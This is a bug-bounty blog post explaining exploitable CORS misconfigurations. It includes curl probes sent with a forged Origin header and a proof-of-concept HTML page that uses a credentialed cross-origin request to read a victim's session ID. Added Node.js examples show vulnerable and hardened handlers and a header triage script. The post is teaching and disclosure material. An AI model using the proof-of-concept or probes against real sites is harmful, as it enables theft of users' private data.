Exploiting Misconfigured CORS

The document discusses exploiting misconfigured CORS (Cross-Origin Resource Sharing) configurations to gain unauthorized access to users' data. It provides examples of CORS configurations that could be exploitable, including allowing any origin with credentials or reflecting the request origin with credentials enabled. The document also demonstrates a proof-of-concept exploit code to extract session IDs from a vulnerable site using CORS requests with credentials.
Exploiting Misconfigured CORS (Cross Origin Resource Sharing)


December 16, 2016, by Geekboy

Hello Friends!

A few days ago I noticed a blog post about exploiting Facebook chat and reading all of a user's chats, which made me interested in the issue. It was basically a misconfigured CORS configuration where the null origin is allowed with credentials set to true. It was not something I was hearing of for the first time: @albinowax from PortSwigger explained it very well in his blog post. So after reading that Messenger blog post I went to test for the same issue on some targets where I was allowed to test it.

But before that, here are some tips about CORS and when it can be exploitable from an attacker's point of view:

1. Poorly implemented, best case for attack:

Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true

2. Poorly implemented, exploitable:

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

3. Bad implementation but not exploitable:

Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true

or just

Access-Control-Allow-Origin: *

Even this is not good from a development point of view, but due to the rules of CORS itself, if Access-Control-Allow-Origin is set to * we don't get the benefit of Access-Control-Allow-Credentials: true, which means no access to the victim's cookies.
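The reflected-origin handler behind case 1, placed beside the allow-list handler a server should use instead, as an added example in Node.js; this is not code from the post, and the origins in ALLOWED_ORIGINS, the /vuln/ and /safe/ paths and the JSON body are constructed for the example:

```javascript
// Added example, not code from the blog post: the "reflect any Origin with
// credentials" handler the post describes, beside an allow-list version that
// a server should use instead. Origins in ALLOWED_ORIGINS are constructed.

const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",   // constructed: a first-party front end
  "https://admin.example.com", // constructed: a second first-party origin
]);

// Vulnerable (case 1 above): whatever Origin the browser sent is echoed back
// with credentials enabled, so any site can make a cookie-carrying request
// and read the response.
function vulnerableCorsHeaders(requestOrigin) {
  if (!requestOrigin) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened: exact-match allow list. "null" is refused explicitly (case 2
// above), unlisted origins get no CORS headers at all, and Vary: Origin keeps
// shared caches from serving one origin's answer to another.
function hardenedCorsHeaders(requestOrigin) {
  if (!requestOrigin || requestOrigin === "null") return {};
  if (!ALLOWED_ORIGINS.has(requestOrigin)) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Small CommonJS server exposing both behaviours on /vuln/info and /safe/info,
// so the curl check from the post can be run against each. Body is constructed.
function startServer(port) {
  const http = require("node:http");
  const server = http.createServer((req, res) => {
    const origin = req.headers.origin;
    const cors = req.url.startsWith("/vuln/")
      ? vulnerableCorsHeaders(origin)
      : hardenedCorsHeaders(origin);
    res.writeHead(200, { "Content-Type": "application/json", ...cors });
    res.end(JSON.stringify({ user: "constructed-user", sid: "constructed-session-id" }));
  });
  return server.listen(port);
}

// Start only when explicitly asked, e.g. CORS_DEMO_PORT=8080 node cors-demo.js
if (typeof process !== "undefined" && process.env.CORS_DEMO_PORT) {
  startServer(Number(process.env.CORS_DEMO_PORT));
}
```

With the server running, the post's curl check against http://127.0.0.1:8080/vuln/info with an arbitrary Origin header shows the origin reflected with credentials, while /safe/info returns no Access-Control-Allow-Origin at all for anything outside the allow list, including a null origin.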

When you can't exploit it, even if the above misconfigurations are present:

- The request carries a custom header that is used to authenticate the user.
- The request URI carries a unique authentication token or key.

I am not going to go deeper into CORS, as the earlier blog post covered it very well. Above I mentioned three cases, of which the first two are exploitable. An example of the 2nd case is the Facebook Messenger chat issue I mentioned at the start of the post, and an example of the 1st case is mine, which I found only 2 days ago: any arbitrary Origin is allowed and the same Origin gets reflected back in Access-Control-Allow-Origin with credentials set to true. The best way I found to check for CORS issues is using curl.

e.g. curl https://test.victim.com -H "Origin: https://geekboy.ninja" -I and check the response to see whether the Origin is reflected or not.

Or, if you are a Burp Pro user, Burp Active Scan may find this for you, but in my case it didn't; I don't know the reason. When I curled my target manually, curl https://my.target.com -H "Origin: https://geekboy.ninja" -I, the Origin didn't get reflected, but when I curled the specific endpoint where all the user's data comes back in the response, curl https://my.target.com/api/web/user -H "Origin: https://geekboy.ninja" -I, it reflected my host back with credentials set to true, and that's enough to make this work and steal all that data.
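Triage of what the curl -I probe returns, applying the three cases and the two "can't exploit" conditions from above, as an added example that is not part of the post. parseHeaderBlock, assessCorsResponse and probe are names chosen here; SAMPLE_PROBE is a constructed response modelled on the reflected-origin endpoint described above, and probe() is a fetch-based stand-in for the curl command (Node 18+) and the only part that touches the network:

```javascript
// Added example, not code from the blog post. All function names are chosen
// here; SAMPLE_PROBE is constructed.

// Parse "curl -I"-style output (status line, then "Name: value" lines) into a
// map keyed by lower-cased header name.
function parseHeaderBlock(raw) {
  const headers = {};
  for (const line of raw.split(/\r?\n/)) {
    const i = line.indexOf(":");
    if (i <= 0) continue; // status line or blank line
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return headers;
}

// Decide what a credentialed cross-origin read from `requestOrigin` would get.
// authViaCustomHeader / authInUrl are the two conditions from the post under
// which a reflected or null origin still cannot be abused.
function assessCorsResponse({ requestOrigin, headers, authViaCustomHeader = false, authInUrl = false }) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const acao = h["access-control-allow-origin"];
  const credentials = (h["access-control-allow-credentials"] || "").trim().toLowerCase() === "true";

  if (acao === undefined) {
    return { finding: "no-cors-headers", risk: "none", why: "browser blocks the cross-origin read" };
  }
  if (acao === "*") {
    return { finding: credentials ? "wildcard-with-credentials" : "wildcard", risk: "none",
             why: "browsers never attach cookies when the allowed origin is '*' (case 3)" };
  }
  if (!credentials) {
    return { finding: "origin-allowed-without-credentials", risk: "none",
             why: "response readable, but without the victim's cookies" };
  }
  const originMatches = acao === "null" || acao === requestOrigin;
  if (!originMatches) {
    return { finding: "fixed-origin", risk: "none", why: `only ${acao} may read this response` };
  }
  if (authViaCustomHeader || authInUrl) {
    return { finding: "credentialed-but-auth-not-cookie-based", risk: "none",
             why: "a custom auth header or a key in the URI is not supplied by the browser" };
  }
  if (acao === "null") {
    return { finding: "null-with-credentials", risk: "high", why: "case 2: null origin allowed with credentials" };
  }
  return { finding: "reflected-with-credentials", risk: "high", why: "case 1: request origin reflected with credentials" };
}

// Network stand-in for: curl URL -H "Origin: ..." -I  (Node 18+ global fetch)
async function probe(url, origin) {
  const res = await fetch(url, { headers: { Origin: origin }, redirect: "manual" });
  return Object.fromEntries(res.headers.entries());
}

// Constructed sample, modelled on the reflected-origin endpoint in the post.
const SAMPLE_PROBE = [
  "HTTP/1.1 200 OK",
  "Content-Type: application/json",
  "Access-Control-Allow-Origin: https://geekboy.ninja",
  "Access-Control-Allow-Credentials: true",
  "",
].join("\r\n");

// Run the triage over the constructed sample; returns the finding object.
function assessSample() {
  return assessCorsResponse({
    requestOrigin: "https://geekboy.ninja",
    headers: parseHeaderBlock(SAMPLE_PROBE),
  });
}
```

The ordering of the checks matters: a wildcard or an absent credentials header is ruled out before the origin is compared, so a reflected origin without Access-Control-Allow-Credentials: true is reported as readable-but-uncredentialed rather than as a finding. For a live check, pass the result of probe(url, origin) as headers together with the same origin.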

I made a quick PoC page for it:

<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Show the cross-origin response body; write it to the page as text, not HTML
      alert(this.responseText);
      document.getElementById("demo").textContent = this.responseText;
    }
  };
  xhttp.open("GET", "https://target.com/info/", true);
  // Send the victim's cookies along with the cross-origin request
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</center>
</body>
</html>

And here is how it worked 🙂


Sources for a better understanding of CORS:

- http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html
- https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS
- https://ejj.io/misconfigured-cors/

Ref: https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/
